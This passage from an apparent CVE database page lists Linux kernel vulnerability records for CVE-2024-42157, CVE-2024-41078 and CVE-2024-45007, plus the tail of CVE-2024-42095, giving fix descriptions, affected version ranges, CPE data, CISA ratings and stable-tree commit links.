        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cb879300669881970eabebe64bd509dbbe42b9de"
        },
        {
          "url": "https://git.kernel.org/stable/c/87257a28271c828a98f762bf2dd803c1793d2b5b"
        },
        {
          "url": "https://git.kernel.org/stable/c/98840e410d53329f5331ecdce095e740791963d0"
        },
        {
          "url": "https://git.kernel.org/stable/c/e67d7f38008e56fb691b6a72cadf16c107c2f48b"
        },
        {
          "url": "https://git.kernel.org/stable/c/6270051f656004ca5cde644c73cb1fa4d718792e"
        },
        {
          "url": "https://git.kernel.org/stable/c/9d141c1e615795eeb93cd35501ad144ee997a826"
        }
      ],
      "title": "serial: 8250_omap: Implementation of Errata i2310",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42095",
    "datePublished": "2024-07-29T17:39:30.948Z",
    "dateReserved": "2024-07-29T15:50:41.173Z",
    "dateUpdated": "2025-11-03T22:01:29.111Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42157 (GCVE-0-2024-42157)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:02

Title

s390/pkey: Wipe sensitive data on failure

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/pkey: Wipe sensitive data on failure Wipe sensitive data from stack also if the copy_to_user() fails.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6e2e374403bf73140…
	https://git.kernel.org/stable/c/b5eb9176ebd4697bc…
	https://git.kernel.org/stable/c/93c034c4314bc4c44…
	https://git.kernel.org/stable/c/4889f117755b2f18c…
	https://git.kernel.org/stable/c/c51795885c801b6b7…
	https://git.kernel.org/stable/c/90a01aefb84b09ccb…
	https://git.kernel.org/stable/c/c44a2151e5d21c66b…
	https://git.kernel.org/stable/c/1d8c270de5eb74245…

Impacted products

Vendor

Product

Version

Linux

Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 6e2e374403bf73140d0efc9541cb1b3bea55ac02 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < b5eb9176ebd4697bc248bf8d145e66d782cf5250 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 93c034c4314bc4c4450a3869cd5da298502346ad (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 4889f117755b2f18c23045a0f57977f3ec130581 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < c51795885c801b6b7e976717e0d6d45b1e5be0f0 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 90a01aefb84b09ccb6024d75d85bb8f620bd3487 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < c44a2151e5d21c66b070a056c26471f30719b575 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 1d8c270de5eb74245d72325d285894a577a945d9 (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:19.958Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6e2e374403bf73140d0efc9541cb1b3bea55ac02"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b5eb9176ebd4697bc248bf8d145e66d782cf5250"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93c034c4314bc4c4450a3869cd5da298502346ad"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4889f117755b2f18c23045a0f57977f3ec130581"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c51795885c801b6b7e976717e0d6d45b1e5be0f0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/90a01aefb84b09ccb6024d75d85bb8f620bd3487"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c44a2151e5d21c66b070a056c26471f30719b575"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1d8c270de5eb74245d72325d285894a577a945d9"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42157",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:05.289606Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:34.008Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6e2e374403bf73140d0efc9541cb1b3bea55ac02",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "b5eb9176ebd4697bc248bf8d145e66d782cf5250",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "93c034c4314bc4c4450a3869cd5da298502346ad",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "4889f117755b2f18c23045a0f57977f3ec130581",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "c51795885c801b6b7e976717e0d6d45b1e5be0f0",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "90a01aefb84b09ccb6024d75d85bb8f620bd3487",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "c44a2151e5d21c66b070a056c26471f30719b575",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "1d8c270de5eb74245d72325d285894a577a945d9",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Wipe sensitive data on failure\n\nWipe sensitive data from stack also if the copy_to_user() fails."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:21.751Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6e2e374403bf73140d0efc9541cb1b3bea55ac02"
        },
        {
          "url": "https://git.kernel.org/stable/c/b5eb9176ebd4697bc248bf8d145e66d782cf5250"
        },
        {
          "url": "https://git.kernel.org/stable/c/93c034c4314bc4c4450a3869cd5da298502346ad"
        },
        {
          "url": "https://git.kernel.org/stable/c/4889f117755b2f18c23045a0f57977f3ec130581"
        },
        {
          "url": "https://git.kernel.org/stable/c/c51795885c801b6b7e976717e0d6d45b1e5be0f0"
        },
        {
          "url": "https://git.kernel.org/stable/c/90a01aefb84b09ccb6024d75d85bb8f620bd3487"
        },
        {
          "url": "https://git.kernel.org/stable/c/c44a2151e5d21c66b070a056c26471f30719b575"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d8c270de5eb74245d72325d285894a577a945d9"
        }
      ],
      "title": "s390/pkey: Wipe sensitive data on failure",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42157",
    "datePublished": "2024-07-30T07:46:59.362Z",
    "dateReserved": "2024-07-29T15:50:41.194Z",
    "dateUpdated": "2025-11-03T22:02:19.958Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41078 (GCVE-0-2024-41078)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:04 – Updated: 2026-01-05 10:37

Title

btrfs: qgroup: fix quota root leak after quota disable failure

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: qgroup: fix quota root leak after quota disable failure If during the quota disable we fail when cleaning the quota tree or when deleting the root from the root tree, we jump to the 'out' label without ever dropping the reference on the quota root, resulting in a leak of the root since fs_info->quota_root is no longer pointing to the root (we have set it to NULL just before those steps). Fix this by always doing a btrfs_put_root() call under the 'out' label. This is a problem that exists since qgroups were first added in 2012 by commit bed92eae26cc ("Btrfs: qgroup implementation and prototypes"), but back then we missed a kfree on the quota root and free_extent_buffer() calls on its root and commit root nodes, since back then roots were not yet reference counted.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/94818bdb00ef34a99…
	https://git.kernel.org/stable/c/8a69529f22590b67b…
	https://git.kernel.org/stable/c/5ef3961682e5310f2…
	https://git.kernel.org/stable/c/f88aeff5a173e8ba3…
	https://git.kernel.org/stable/c/7dd6a5b96157a2124…
	https://git.kernel.org/stable/c/a7e4c6a3031c74078…

Impacted products

Vendor

Product

Version

Linux

Affected: bed92eae26ccf280d1a2168b7509447b56675a27 , < 94818bdb00ef34a996a06aa63d11f591074cb757 (git)
Affected: bed92eae26ccf280d1a2168b7509447b56675a27 , < 8a69529f22590b67bb018de9acbcf94abc8603cf (git)
Affected: bed92eae26ccf280d1a2168b7509447b56675a27 , < 5ef3961682e5310f2221bae99bcf9f5d0f4b0d51 (git)
Affected: bed92eae26ccf280d1a2168b7509447b56675a27 , < f88aeff5a173e8ba3133314eb4b964236ef3589d (git)
Affected: bed92eae26ccf280d1a2168b7509447b56675a27 , < 7dd6a5b96157a21245566b21fd58276a214357ff (git)
Affected: bed92eae26ccf280d1a2168b7509447b56675a27 , < a7e4c6a3031c74078dba7fa36239d0f4fe476c53 (git)

Linux

Affected: 3.6
Unaffected: 0 , < 3.6 (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.101 , ≤ 6.1.* (semver)
Unaffected: 6.6.42 , ≤ 6.6.* (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:35.508Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/94818bdb00ef34a996a06aa63d11f591074cb757"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a69529f22590b67bb018de9acbcf94abc8603cf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5ef3961682e5310f2221bae99bcf9f5d0f4b0d51"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f88aeff5a173e8ba3133314eb4b964236ef3589d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7dd6a5b96157a21245566b21fd58276a214357ff"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a7e4c6a3031c74078dba7fa36239d0f4fe476c53"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41078",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:21:14.829308Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:59.724Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/qgroup.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "94818bdb00ef34a996a06aa63d11f591074cb757",
              "status": "affected",
              "version": "bed92eae26ccf280d1a2168b7509447b56675a27",
              "versionType": "git"
            },
            {
              "lessThan": "8a69529f22590b67bb018de9acbcf94abc8603cf",
              "status": "affected",
              "version": "bed92eae26ccf280d1a2168b7509447b56675a27",
              "versionType": "git"
            },
            {
              "lessThan": "5ef3961682e5310f2221bae99bcf9f5d0f4b0d51",
              "status": "affected",
              "version": "bed92eae26ccf280d1a2168b7509447b56675a27",
              "versionType": "git"
            },
            {
              "lessThan": "f88aeff5a173e8ba3133314eb4b964236ef3589d",
              "status": "affected",
              "version": "bed92eae26ccf280d1a2168b7509447b56675a27",
              "versionType": "git"
            },
            {
              "lessThan": "7dd6a5b96157a21245566b21fd58276a214357ff",
              "status": "affected",
              "version": "bed92eae26ccf280d1a2168b7509447b56675a27",
              "versionType": "git"
            },
            {
              "lessThan": "a7e4c6a3031c74078dba7fa36239d0f4fe476c53",
              "status": "affected",
              "version": "bed92eae26ccf280d1a2168b7509447b56675a27",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/qgroup.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.6"
            },
            {
              "lessThan": "3.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.101",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.42",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.101",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.42",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: qgroup: fix quota root leak after quota disable failure\n\nIf during the quota disable we fail when cleaning the quota tree or when\ndeleting the root from the root tree, we jump to the \u0027out\u0027 label without\never dropping the reference on the quota root, resulting in a leak of the\nroot since fs_info-\u003equota_root is no longer pointing to the root (we have\nset it to NULL just before those steps).\n\nFix this by always doing a btrfs_put_root() call under the \u0027out\u0027 label.\nThis is a problem that exists since qgroups were first added in 2012 by\ncommit bed92eae26cc (\"Btrfs: qgroup implementation and prototypes\"), but\nback then we missed a kfree on the quota root and free_extent_buffer()\ncalls on its root and commit root nodes, since back then roots were not\nyet reference counted."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:44.527Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/94818bdb00ef34a996a06aa63d11f591074cb757"
        },
        {
          "url": "https://git.kernel.org/stable/c/8a69529f22590b67bb018de9acbcf94abc8603cf"
        },
        {
          "url": "https://git.kernel.org/stable/c/5ef3961682e5310f2221bae99bcf9f5d0f4b0d51"
        },
        {
          "url": "https://git.kernel.org/stable/c/f88aeff5a173e8ba3133314eb4b964236ef3589d"
        },
        {
          "url": "https://git.kernel.org/stable/c/7dd6a5b96157a21245566b21fd58276a214357ff"
        },
        {
          "url": "https://git.kernel.org/stable/c/a7e4c6a3031c74078dba7fa36239d0f4fe476c53"
        }
      ],
      "title": "btrfs: qgroup: fix quota root leak after quota disable failure",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41078",
    "datePublished": "2024-07-29T15:04:15.812Z",
    "dateReserved": "2024-07-12T12:17:45.632Z",
    "dateUpdated": "2026-01-05T10:37:44.527Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-45007 (GCVE-0-2024-45007)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:15

Title

char: xillybus: Don't destroy workqueue from work item running on it

Summary

In the Linux kernel, the following vulnerability has been resolved: char: xillybus: Don't destroy workqueue from work item running on it Triggered by a kref decrement, destroy_workqueue() may be called from within a work item for destroying its own workqueue. This illegal situation is averted by adding a module-global workqueue for exclusive use of the offending work item. Other work items continue to be queued on per-device workqueues to ensure performance.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/409b495f8e3300d5f…
	https://git.kernel.org/stable/c/5d3567caff2a1d678…
	https://git.kernel.org/stable/c/a7ad105b12256ec7f…
	https://git.kernel.org/stable/c/aa1a19724fa2c31e9…
	https://git.kernel.org/stable/c/ccbde4b128ef9c73d…

Impacted products

Vendor

Product

Version

Linux

Affected: a53d1202aef122894b6e46116a92174a9123db5d , < 409b495f8e3300d5fba08bc817fa8825dae48cc9 (git)
Affected: a53d1202aef122894b6e46116a92174a9123db5d , < 5d3567caff2a1d678aa40cc74a54e1318941fad3 (git)
Affected: a53d1202aef122894b6e46116a92174a9123db5d , < a7ad105b12256ec7fb6d6d1a0e2e60f00b7da157 (git)
Affected: a53d1202aef122894b6e46116a92174a9123db5d , < aa1a19724fa2c31e97a9be48baedd4692b265157 (git)
Affected: a53d1202aef122894b6e46116a92174a9123db5d , < ccbde4b128ef9c73d14d0d7817d68ef795f6d131 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45007",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-04T20:18:02.092262Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-04T20:18:23.535Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:15:10.885Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/char/xillybus/xillyusb.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "409b495f8e3300d5fba08bc817fa8825dae48cc9",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            },
            {
              "lessThan": "5d3567caff2a1d678aa40cc74a54e1318941fad3",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            },
            {
              "lessThan": "a7ad105b12256ec7fb6d6d1a0e2e60f00b7da157",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            },
            {
              "lessThan": "aa1a19724fa2c31e97a9be48baedd4692b265157",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            },
            {
              "lessThan": "ccbde4b128ef9c73d14d0d7817d68ef795f6d131",
              "status": "affected",
              "version": "a53d1202aef122894b6e46116a92174a9123db5d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/char/xillybus/xillyusb.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: xillybus: Don\u0027t destroy workqueue from work item running on it\n\nTriggered by a kref decrement, destroy_workqueue() may be called from\nwithin a work item for destroying its own workqueue. This illegal\nsituation is averted by adding a module-global workqueue for exclusive\nuse of the offending work item. Other work items continue to be queued\non per-device workqueues to ensure performance."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:13:12.912Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/409b495f8e3300d5fba08bc817fa8825dae48cc9"
        },
        {
